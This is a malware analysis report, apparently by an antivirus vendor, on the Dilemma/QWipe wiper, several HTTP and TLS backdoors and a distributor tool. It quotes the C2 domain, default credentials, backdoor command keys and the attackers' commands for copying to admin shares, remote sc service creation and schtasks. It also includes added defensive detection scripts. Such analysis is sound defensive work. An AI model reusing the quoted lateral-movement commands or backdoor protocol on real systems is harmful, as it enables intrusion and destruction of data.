HackTool.Win32.APT-PS

Updated on 03-13-2022:

On 03-11-2022 the AFTA Center released a warning about this set of malware under the title “detecting a new malware in infrastructure” and named it “Dilemma”. It is the same file as HackTool.Win32.QWipe, and its complete analysis follows.

Please refer to AFTA Center to read the report.

Technical details

1.1 Modules and malware operation sequences

This malware consists of several modules, including executable programs and various scripts, each of which performs one small task.
The following is a list of the malware files with a brief description of what each one does.

File Name | Description
HackTool.Win32.PS_Backdoor | Backdoor file used to execute the hacker’s commands and to download/upload arbitrary files
HackTool.Win32.QWipe | Wipes hard-disk data, changes users’ passwords, deletes Windows backup files, etc.
wint.bat | Runs the scheduled task that starts the msdskint.exe service
Lastfile | Contains the path of the last corrupted file
HackTool.Win32.HttpBackdoor | Acts as an HTTP backdoor on the system and executes the intruder’s commands
HackTool.Win32.HttpCallBackService | The intruder’s HttpCallBackService tool for establishing a connection with C&C servers
HackTool.Win32.PS_Distributor | Distributes the hacker’s HttpBackdoor tool across the network

Table 1 – Summary of the malware payloads

1.1.1 HackTool.Win32.PS_Backdoor threat behaviour

This malware acts as a backdoor for the hacker: it lets the hacker execute commands remotely from the server, and it can also download and upload arbitrary files. All data this file sends and receives travels inside TLS packets.

This malware creates four sockets bound to local addresses on the victim’s system and then listens for data on them. When data arrives, it forwards it to its remote server at the address below. The malware uses port 8443 to connect to its remote server; like port 443, this port carries TLS-encrypted traffic. Currently, this server is offline.

Http://dropboxui[.]com:8443

When port 443 is used, the port does not need to be written after the domain; with port 8443 the port has to be given explicitly after the domain.

In the following, we explain what each socket does.

Socket | Function
127.0.0.1:62563 | For every TLS packet received on this socket, the malware spawns a cmd.exe process by calling the main_startshell function; once the command has run it ends the cmd.exe process and listens again. The malware appears to use this socket only to receive commands for execution.
127.0.0.1:36774 | Receives HTTP packets inside TLS and calls the main_starthttp function to download/upload files.
[::]:49151 and 0.0.0.0:49151 | Establishes a proxy between this socket and the hacker’s remote server

Table 2- The malware sockets and their functions
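A host triage check for the listener pattern in Table 2, added here as an example (it is not code from the report or from the malware): it parses `netstat -aon` text and flags LISTENING sockets on 127.0.0.1:62563, 127.0.0.1:36774 and port 49151, plus ports 9399/9396, which the report attributes to the HttpBackdoor listener later on. The netstat lines and PIDs below are constructed for the demonstration.

```python
"""Flag listening sockets that match the backdoor's bind addresses."""
import re

# Loopback sockets are matched on the exact (host, port) pair; the others on
# port only, because the bind address (0.0.0.0 or [::]) varies per sample.
SUSPECT_LOOPBACK = {("127.0.0.1", 62563), ("127.0.0.1", 36774)}
SUSPECT_PORTS = {49151, 9399, 9396}

# netstat -aon row: Proto  Local Address  Foreign Address  State  PID
# (UDP rows have no State column and therefore never match).
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")


def split_endpoint(endpoint):
    """Split '127.0.0.1:62563' or '[::]:49151' into (host, port)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def find_suspect_listeners(netstat_text):
    """Return [(host, port, pid)] for LISTENING TCP sockets from the report."""
    hits = []
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(1) != "TCP" or m.group(4) != "LISTENING":
            continue
        host, port = split_endpoint(m.group(2))
        pid = int(m.group(5))
        if (host, port) in SUSPECT_LOOPBACK or port in SUSPECT_PORTS:
            hits.append((host, port, pid))
    return hits


# Constructed sample output; only the flagged rows mirror the report.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:49151          0.0.0.0:0              LISTENING       4120
  TCP    127.0.0.1:62563        0.0.0.0:0              LISTENING       4120
  TCP    127.0.0.1:36774        0.0.0.0:0              LISTENING       4120
  TCP    127.0.0.1:49152        127.0.0.1:135          ESTABLISHED     912
  TCP    [::]:49151             [::]:0                 LISTENING       4120
  UDP    0.0.0.0:5353           *:*                                    1560
"""

if __name__ == "__main__":
    for host, port, pid in find_suspect_listeners(SAMPLE_NETSTAT):
        print(f"suspect listener {host}:{port} owned by PID {pid}")
```

On a live host, feed it the saved output of `netstat -aon` and pivot on the PID into the process list.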

1.1.2 wint.bat file behaviour

This file runs the malware’s Wiper service, a service registered under the fake name Windows Taks Scheduler (note that they used the word Taks instead of Task). The Wiper file has been seen on different systems at the following paths, under the names msdskint.exe and Dilemma.exe:

c:\windows\ccmcache\6\msdskint.exe

c:\programdata\pcmr\msdskint.exe

1.1.3 HackTool.Win32.QWipe behaviour

This file is the Wiper the hacker created; it can take arguments. If no argument is supplied, the file also contains predefined arguments that it uses during execution.

The hacker packed this file with the “Eziriz .NET Reactor” tool to hide the malware code from analysts and antivirus products. The following describes how it behaves after unpacking.

The following table lists the arguments the Wiper accepts and what each one does.

Argument | Function
-wipe-exclude | The paths given after this argument are added to the malware’s exclusion list so that they are left untouched during wiping.
-light-wipe | The number of times the malware’s buffer is written to each file on the victim’s system during wiping.
-sessions | Restarts and logs off all active sessions on the system
-delete-users | Deletes all user accounts given with the argument
-shadows | Wipes all system backup versions
-start-iis | Restarts the iis service
-config | Undefined activity
-processes | Terminates all processes given with the argument
-logs | Wipes all OS and Event Viewer logs using Windows wevtutil.exe and Enum
-delete | If given, the wiped files are finally removed from the system (via Win32Native.DeleteFile)
-break-users | Changes passwords on the victim’s system
-wipe-only | Wipes only the files at the given paths
-purge | A complete removal whose wiping procedure differs from the normal one.
-passwords | Undefined activity
-wipe-all | Wipes all system drives
-stop-iis | Stops the iis service

Table 3- HackTool.Win32.QWipe malware arguments

  • -break-users argument

If this argument is given and a user is specified, the malware sets a new password on each named account. The password is the fixed string “S7Y1a82R!”.

Figure 1- Changing the user’s password by the malware

  • -purge argument

This argument is used when the malware wipes files. In general, the value written over the data is a 200-byte buffer whose contents are generated randomly by an algorithm.

If the purge argument is given, a full_purge flag is set inside the malware code; this is the malware’s complete wipe. In this mode the wiping procedure writes the buffer value over the file repeatedly until it reaches the end of the file.

The malware also contains a purgeExtensions list in its code, holding the hacker’s candidate suffixes. A file that has one of the following suffixes is wiped with the same procedure as full_purge.

Figure 2- Candidate suffixes

In addition to the above list, there are other strings inside the malware file that can serve as candidate suffixes; they are as follows:

.accdb, .cdx, .dmp, .js, .pnf, .rom, .tif, .wmdb, .acl, .cfg, .doc, .hlp, .png, .rpt, .tiff, .wmv, .acm, .chk, .docx, .hpi, .lnk, .pps, .rsp, .tlb, .xdr, .amr, .com, .dot, .ppt, .sam, .tmp, .xls, .apln, .cpl, .drv, .pptx, .scp, .tsp, .xlsx, .asp, .cpx, .dwg, .hxx, .m4a, .pro, .scr, .avi, .dat, .eml, .ico, .mid, .psd, .sdb, .xsd, .ax, .db, .nls, .rar, .sig, .wab, .zip, .bak, .dbf, .ext, .one, .wab~, .bin, .dbx, .fdb, .jar, .pdf, .rdf, .sqlite, .wav, .bmp, .dll, .gif, .jpg, .pip, .resources, .theme, .wma, .config, .mxf, .mp3, .mp4, .cs, .vb, .tib, .aspx, .pem, .crt, .msg, .mail, .enc, .msi, .cab, .plb, .plt

  • -wipe-all argument

If this argument is given, all of the system’s active drives are stored in a list, and then all data on those drives is wiped.

Three files are excluded when data is wiped:

  • default.htm
  • index.htm
  • death_to_raisi.exe

In the malware’s wiping procedure, when neither the full_purge flag is set nor the file’s suffix is among the candidate suffixes, it first writes 200 bytes from the defined buffer at offset zero of the file. It then divides the total file size by 1024 and stores the result in num4.

If the light_wipe argument has no entered value, the minimum of light_wipe and num4 is computed and stored in num4.

It then moves 1024 bytes (0x400) forward from that offset and writes the next 200 bytes again, continuing this pattern until the end of the file. Finally, it creates the lastfile2 file inside the wiped folder and writes the wiped file’s path into it.
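A recovery-triage calculation for the wipe pattern described above, added here as an example (it is not code from the report or from the malware and writes nothing to disk): given a file size and the -light-wipe value it reproduces the arithmetic the report describes (200-byte writes at offset 0 and then every 1024 bytes, count limited to min(light_wipe, size // 1024)) and reports which byte ranges were destroyed and how much of the file is intact, which tells a responder whether carving the remainder is worthwhile. Assumptions not stated in the report: num4 counts all writes including the one at offset 0, the offset-0 write always happens, and a write is cut off at the end of the file.

```python
"""Compute the byte ranges destroyed by the QWipe "light wipe" pattern."""
BUFFER_LEN = 200   # size of the random buffer written at each position
STRIDE = 1024      # distance between successive buffer writes


def write_count(size, light_wipe=None):
    """num4 from the report: size // 1024, capped by -light-wipe if given."""
    num4 = size // STRIDE
    if light_wipe is not None:
        num4 = min(light_wipe, num4)
    return max(num4, 1)   # assumption: the offset-0 write always happens


def overwritten_ranges(size, light_wipe=None):
    """Byte ranges [start, end) destroyed by the wipe pattern."""
    ranges = []
    for i in range(write_count(size, light_wipe)):
        start = i * STRIDE
        if start >= size:
            break
        ranges.append((start, min(start + BUFFER_LEN, size)))   # assumption: cut at EOF
    return ranges


def intact_fraction(size, light_wipe=None):
    """Fraction of the original bytes untouched by the wipe."""
    if size == 0:
        return 1.0
    lost = sum(end - start for start, end in overwritten_ranges(size, light_wipe))
    return (size - lost) / size


def triage(size, light_wipe=None):
    """One-line, human-readable summary for a file of the given size."""
    ranges = overwritten_ranges(size, light_wipe)
    return (f"{size} bytes: {len(ranges)} overwritten block(s) {ranges}, "
            f"{intact_fraction(size, light_wipe):.1%} intact")


if __name__ == "__main__":
    # Default service configuration: -light-wipe 3 (see the default arguments).
    for size in (3072, 500, 5 * 1024 * 1024):
        print(triage(size, light_wipe=3))
    # Without a -light-wipe cap the pattern runs to the end of the file.
    print(triage(10240))
```

With the default -light-wipe 3 only 600 bytes of a large file are destroyed, so headers are lost but most of the content of large files survives for carving; without the cap about one fifth of every file is gone.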

As mentioned before, if the malware’s Wiper file receives no argument it uses its predefined arguments. When the file is run as a service it contains the following default arguments:

Figure 3- String list used as the default arguments

According to these arguments, the service acts as follows:

1- The -light-wipe value is 3, meaning the wiping buffer is written 3 times to each file.

2- The iis service is stopped.

3- All Windows Event Viewer logs are deleted.

4- All backup files are deleted.

5- The -processes value is *sql, meaning every process whose name contains the string sql is terminated.

6- All data on active drives, except the excluded paths, is wiped.

7- The paths excluded by the hacker are as follows:

  • "C:\Windows"
  • "C:\$Recycle.Bin"
  • "C:\$WinREAgent"
  • "C:\Config.Msi"
  • "C:\MSOCache"
  • "C:\Recovery"
  • "C:\Program Files\IBM\*"
  • "C:\System Volume Information"
  • "C:\Program Files\dotnet"
  • "C:\Program Files (x86)\dotnet*"
  • "C:\Program Files\Symantec*"
  • "C:\Program Files (x86)\Symantec*"
  • "C:\Program Files (x86)\Padvish*"
  • "C:\Program Files\Kaspersky*"
  • "C:\Program Files (x86)\Kaspersky*"
  • "C:\Program Files\Microsoft*"
  • "C:\Program Files (x86)\Microsoft*"
  • "C:\Program Files\Windows*"
  • "C:\Program Files (x86)\Windows*"

There is a function inside the malware code showing that the hacker was sensitive to the Padvish antivirus. For instance, as Figure 4 shows, the malware checks the list of running processes on the victim’s system. If Padvish or its UI is running, instead of running its default wiping functions the malware tries another method to wipe data.

It seems the malware switches tactics to evade Padvish’s behavioural detection, which detects its wiping method and immediately blocks it; however, Padvish has also detected and blocked the malware’s other methods.

In the second method, the malware creates a temporary batch file (tmp.bat) for each system file and creates two temporary scheduled tasks with system permissions for these files.

Figure 4- The malware searching for the Padvish antivirus UI and service

Figure 5- The malware changing its wiping method after finding the Padvish antivirus service

Below is an example of the batch file that is created:

Figure 6- An example of a batch file created to wipe data

As the batch file contents show, the malware first uses the Windows fsutil tool to create a file of the same size as the file to be wiped (3072 bytes), filled with null bytes and carrying the .qipe extension. It then tries to replace the original file with this fake file.

The hacker knew that Padvish could stop this malware from wiping data, so it tried yet another method, using a standard system tool, to wipe data. Nevertheless, the Padvish anti-ransomware component (Anti-Crypto) successfully blocked this attack.

There are commands inside the malware code indicating that it can store run-time logs while wiping, as follows:

There are strings such as “– Excluded”, “– Skipped”, “BreakSelectedUsers”, “DeleteSelectedUsers”, “KillProcesses”, etc. The log ends with the “Finished on” string and records the time the wiping finished. However, it seems the hacker did not need to keep the log from the Wiper file, because no code was written for the Output function, which is responsible for printing the result.

1.1.4 HackTool.Win32.HttpCallbackService behaviour

The hacker uses this file as a tool for downloading/uploading files and executing arbitrary commands on the victim’s system. Its behaviour is explained below.

This file reads the information about the malware server from its configuration file or from its input.

The following table shows the commands supported by this tool:

Command | Function
Download/Upload | Encrypted download from the victim’s system to the malware server, or upload from the server to the victim, and vice versa
stay-alive | Activates the isStayAliveMode flag
cool-down | Deactivates the isStayAliveMode flag (for 1 minute)
Default behaviour | Executes the hacker’s commands through the command line

Table 4- HttpCallbackService tool command list

The following figures show the complete scheme of the malware and the queries it accepts.

Figure 7- HttpCallbackService malware function

Figure 8- List of strings and queries

First, the malware reads the hacker’s server address from the configuration file and, depending on the configuration file contents, uses the following queries.

Query | Ending of the configuration file
=m? | .aspx
=m? | .php
=m | /
=m/ | default

Table 5- Strings and queries

The procedure for receiving commands from the server, for example when the malware server downloads a file from the client, is as follows: after connecting to the server, the contents of the file named =m are fetched from the server. After the specified file path is resolved, the file is encoded with base64 and sent to the server.

Figure 9- Contents of the command file on the server-side

Figure 10- Encoding file using the malware and sending it to the malware server

If the =m file contains a command, the command is executed by cmd.exe.

Figure 11- Executing commands by cmd.exe

The malware writes the results of its operations to a .out file on the victim’s system.

Figure 12- The malware HttpCallbackService output log

1.1.5 HackTool.Win32.HttpBackdoor behaviour

This file acts as an HTTP service for the hacker. The information for the hacker’s arbitrary commands is stored in two files: uhsvc.exe.start and uhscv.exe.ini. The file name differed between attacks.

This service, registered on the system as Microsoft Update Health Host, contains commands to download/upload files; it can also connect to an SQL database, send the results to the malicious server, and manipulate local files. Two versions of the httpservice have been found, 0.1.3vXH and 0.1.4vXH; they do not differ in behaviour and accept the same commands.

This file, like the hacker’s Wiper file, is packed with the “Eziriz .NET Reactor” tool. Additionally, the malware configuration file contains the following commands.

Command | Function
ipconfig /all | Retrieves the network card IP settings
whoami /all | Retrieves the username, user groups, privileges, and access rights
systeminfo | General system information such as OS type, physical and virtual memory, domain, network card, etc.
tasklist | List of running processes
wmic logicaldisk get name | Names of the disk partitions
net user | User names on the current system
dir c:\users | Lists the contents of c:\users
net sessions | List of current remote sessions
net view /all | List of currently shared resources
net share | List of shared drives and folders
route print | Routing table information
netstat -aon | Connection table of active ports
ping 8.8.8.8 -n 2 | Checks whether the current system can reach the Internet

Table 6- Commands used inside the HttpBackdoor tool configuration file

After decoding, the following behaviour was observed:

1- Once run as a service, the malware creates a tcpListener on the victim’s system. We describe one of the malware versions, which uses port 9399. In the samples found with uhscv.exe.start, the hacker allowed incoming packets to port 9399 (in some cases port 9396) through the firewall from outside the victim’s network.

Figure 13- uhsvc.exe.start file contents

2- The malware can receive and execute various commands from the hacker’s server; it executes them with cmd.

Figure 14- Executing hacker’s arbitrary commands using shell

3- Uses the sqlConnection and sqlCommand functions to run queries against the SQL database

4- Creates files

Figure 15- Creating file by the hacker using malware

5- The malware can zip or unzip directory contents, download/upload files, and delete the hacker’s chosen files when needed. It uses the IonicZip library to compress files.

Figure 16- Compressing/decompressing and removing files

Figure 17- Manipulating directory contents

6- Ability to receive proxies chosen by the server and connect to the server through them, using the =b and =p commands

Figure 18- Commands related to proxy

Figure 19- Setting proxy

7- Ability to display the malware version to the hacker (the hacker used several versions of HackTool.Win32.HttpBackdoor in this operation)

Figure 20- Displaying the malware version

8- Ability to display the current malware file path (“c:\programdata\pcmr\uhsvc.exe” is the malware path).

9- Ability to create log files and send them to the hacker to show possible errors

Figure 21- Creating a log file

Figure 22- Log file

The following table shows the operations supported by the malware:

Command | Function
a_1=s | Shellexecute with #zip support
a_1=c | Run SQL commands
a_1=i1 | View output and error logs and delete them
a_1=i2 | Delete output and error logs
a_1=i | Run cmd interactively
Cmd= | Shellexecute
W_i | Show malware path
V_i | Show malware version
P= or b= | Act as a proxy and forward the connection to another website/infected node
M=afe=1 | Write any file
Con= | Run SQL commands
Prt= | File manager (browse directories, download/upload files, …)
other | Read/write based on GET

Table 7- Malware web service commands
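Detection logic for the web-service command keys in Table 7, added here as an example (it is not code from the report): it parses constructed W3C-style request lines (date, time, client IP, method, URI stem, query, server port) and flags any query string carrying one of the backdoor’s parameter names. The log layout, client addresses and timestamps are constructed; port 9399 is the listener port the report describes.

```python
"""Flag HTTP requests whose query string carries HttpBackdoor command keys."""
from urllib.parse import parse_qs

# Command keys from Table 7 and what each one drives.
COMMAND_KEYS = {
    "a_1": "sub-command (s=shellexecute, c=SQL, i=interactive cmd, i1/i2=logs)",
    "Cmd": "shellexecute",
    "W_i": "show malware path",
    "V_i": "show malware version",
    "P": "proxy / forward connection",
    "b": "proxy / forward connection",
    "M": "write file",
    "Con": "run SQL commands",
    "Prt": "file manager",
}


def classify_query(query):
    """Return [(key, value, description)] for every backdoor key in a query string."""
    # keep_blank_values so bare flags such as 'W_i' or 'V_i' are retained.
    params = parse_qs(query, keep_blank_values=True)
    return [(k, v, COMMAND_KEYS[k])
            for k, vals in params.items() if k in COMMAND_KEYS for v in vals]


def scan_log(text):
    """Parse constructed lines: date time c-ip method uri-stem uri-query s-port."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        client, stem, query, port = fields[2], fields[4], fields[5], int(fields[6])
        findings = classify_query("" if query == "-" else query)
        if findings:
            hits.append({"client": client, "port": port, "path": stem,
                         "commands": findings})
    return hits


# Constructed sample log; the command keys mirror Table 7.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query s-port
2022-03-10 09:12:01 203.0.113.5 GET /default.aspx a_1=s&Cmd=whoami 9399
2022-03-10 09:12:07 203.0.113.5 GET /default.aspx V_i 9399
2022-03-10 09:13:40 203.0.113.5 POST /default.aspx Prt=download 9399
2022-03-10 09:14:02 192.0.2.44 GET /index.htm - 80
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["port"], hit["path"], hit["commands"])
```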

1.1.6 HackTool.Win32.PS_Distributor behaviour

This file acts as the hacker’s distribution tool. It connects to network clients and creates and starts the hacker’s chosen service and scheduled tasks; in other words, it carries out the distribution across the network.

Figure 23- Starting distributor operation of the malware

This file uses shares and the “net use” command for its operation. As the figure above shows, it contains a default username and password for connecting to the clients:

Username : TicketUser
Password: TicketUser

Additionally, this file can receive the username, password, and share folder path as arguments, and it reads the list of target IPs from distributor.ini.

After connecting to its chosen clients, the malware copies the Httpservice tool as follows:

“copy /y c:\\windows\\msunify4.exe \\\\” + ip + \\c$\\windows\\msedgeupdate.exe

“copy /y c:\\windows\\msunify.start \\\\” + ip + \\c$\\windows\\msedgeupdate.exe.start

As the above commands show, the HackTool.Win32.HttpBackdoor tool exists on the current system under the name msunify4.exe and is copied to the destination system as msedgeupdate.exe. The msunify.start file, copied as msedgeupdate.exe.start, is the configuration file of that tool.

Figure 24- Malware connecting network clients

Then the malware will create the following service:

“sc \\\\” + ip + ” create \”Microsoft Edge Update Service (edgeupdatel)\” binpath= \”c:\\windows\\msedgeupdate.exe\” start= auto”

“sc \\\\” + ip + ” start \”Microsoft Edge Update Service (edgeupdatel)\””

As you can see, a Microsoft Edge Update Service (edgeupdatel) service is created and started on the client for the msedgeupdate.exe file (the HackTool.Win32.HttpBackdoor tool).

Figure 25- Creating and starting the service on the clients

Then the malware creates a scheduled task to run the desired tool on the clients.

“copy c:\\windows\\msunify.css \\\\” + ip + \\c$\\Users\\Public\\CreateService.bat

“schtasks /create /S {0} /tn \”Backup checks\” /XML c:\\windows\\msunify4.xml /U \”{1}\” /P \”{2}\” /F”

“schtasks /run /S {0} /tn \”Backup checks\” /U \”{1}\” /P \”{2}\””

The above commands show that the malware copies the msunify.css file from the current system to the client as CreateService.bat under c$\Users\Public\. This file extracts Nmap.exe to detect any security flaws in the network configuration, and stores the collected data in a file named pse200.tmp. The following command is the content of CreateService.bat:

c:\windows\temp\nmp\nmap.exe -sV 200.200.0.0/16 -oN C:\windows\temp\pse200.tmp

Finally, the HackTool.Win32.PS_Distributor tool creates a scheduled task named Backup Checks from the msunify4.xml file.

Figure 26- Creating a scheduled task by HackTool.Win32.PS_Distributor
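Detection logic for the distribution steps in this section, added here as an example (it is not code from the report or the Padvish product): it scans simplified, constructed Windows event records (System 7045 service installs, Security 4698 scheduled-task creations and 4688 process creations) for the artefacts quoted above: the "Microsoft Edge Update Service (edgeupdatel)" service pointing at c:\windows\msedgeupdate.exe, the "Backup checks" task, remote copies into \\<ip>\c$\windows, remote sc create/start, and the nmap run writing pse200.tmp. The record layout is a constructed dict rather than real EVTX output, and the target IP 10.0.0.7 is constructed.

```python
"""Match constructed Windows event records against PS_Distributor artefacts."""
import re

RULES = [
    # (rule name, event id, field to inspect, pattern)
    ("edgeupdatel service install", 7045, "ServiceName",
     re.compile(r"Microsoft Edge Update Service \(edgeupdatel\)", re.I)),
    ("msedgeupdate.exe service binary", 7045, "ImagePath",
     re.compile(r"\\windows\\msedgeupdate\.exe", re.I)),
    ("Backup checks scheduled task", 4698, "TaskName",
     re.compile(r"\\?Backup checks$", re.I)),
    ("remote copy to admin share", 4688, "CommandLine",
     re.compile(r"copy\s+(/y\s+)?\S+\s+\\\\[\d.]+\\c\$\\", re.I)),
    ("remote sc create/start", 4688, "CommandLine",
     re.compile(r"\bsc\s+\\\\[\d.]+\s+(create|start)\b", re.I)),
    ("nmap sweep to pse200.tmp", 4688, "CommandLine",
     re.compile(r"nmap\.exe.*-oN\s+\S*pse200\.tmp", re.I)),
]


def match_event(event):
    """Return the names of all rules an event record triggers."""
    return [name for name, eid, field, rx in RULES
            if event.get("EventID") == eid and rx.search(event.get(field, ""))]


def scan(events):
    """Map each triggered rule name to the event records that hit it."""
    hits = {}
    for ev in events:
        for name in match_event(ev):
            hits.setdefault(name, []).append(ev)
    return hits


# Constructed sample records mirroring the commands quoted in the report.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Microsoft Edge Update Service (edgeupdatel)",
     "ImagePath": "c:\\windows\\msedgeupdate.exe", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "Print Spooler",
     "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"},
    {"EventID": 4698, "TaskName": "\\Backup checks"},
    {"EventID": 4688, "CommandLine":
     "copy /y c:\\windows\\msunify4.exe \\\\10.0.0.7\\c$\\windows\\msedgeupdate.exe"},
    {"EventID": 4688, "CommandLine":
     "sc \\\\10.0.0.7 create \"Microsoft Edge Update Service (edgeupdatel)\" "
     "binpath= \"c:\\windows\\msedgeupdate.exe\" start= auto"},
    {"EventID": 4688, "CommandLine":
     "c:\\windows\\temp\\nmp\\nmap.exe -sV 200.200.0.0/16 -oN C:\\windows\\temp\\pse200.tmp"},
    {"EventID": 4688, "CommandLine": "notepad.exe C:\\Users\\Public\\notes.txt"},
]

if __name__ == "__main__":
    for name, evs in scan(SAMPLE_EVENTS).items():
        print(f"{name}: {len(evs)} event(s)")
```

The 7045 and 4698 rules fire on the receiving client, while the 4688 rules fire on the distributing host, so both sides of the copy should be searched.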

2. How to counter this malware

All detected versions and variants of this malware are detected by Padvish Antivirus as HackTool.Win32.HTTPbackdoor, HackTool.Win32.PS_Backdoor, HackTool.Win32.PS_Distributor, HackTool.Win32.HTTPCallBackService and Trojan.Win32.QWipe.

Additionally, the Padvish Data Protection feature detects the malware’s wiping behaviour, prevents any data tampering, and terminates the malware.

3. Indicator of Compromise (IOC)

File name MD5

